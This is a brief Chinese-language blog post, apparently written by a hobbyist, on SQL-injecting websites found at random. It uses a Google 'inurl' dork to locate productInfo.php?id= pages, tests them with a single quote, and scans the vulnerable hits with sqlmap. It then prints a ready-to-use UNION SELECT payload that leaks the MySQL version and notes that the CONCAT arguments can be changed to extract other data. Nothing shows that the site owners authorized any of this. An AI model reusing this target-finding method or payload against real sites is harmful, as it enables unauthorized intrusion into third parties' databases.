一、在Google瀏覽器用inurl搜尋語法尋找目標
inrul:productInfo.php?id=
二、隨便點開幾個連線,目標出現了
給id引數加單引號',頁面不正常了,在上方還出現了查詢報錯的相關資訊,相關資訊還給出了資料庫是MySQL。
三、使用sqlmap進行掃描
經過小小的等待,有收穫了,爆出了資料庫名。
根據sqlmap的給出paylaod可以進行SQL隱碼攻擊,改變concat函式的引數就可以了手工利用了,如下payload可以爆出資料庫版本:
-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-
concat函式的三個引數都是可以回顯利用的。
到這裡SQL隱碼攻擊已經完成了,點到為止。
若有錯誤,歡迎指正!o( ̄▽ ̄)ブ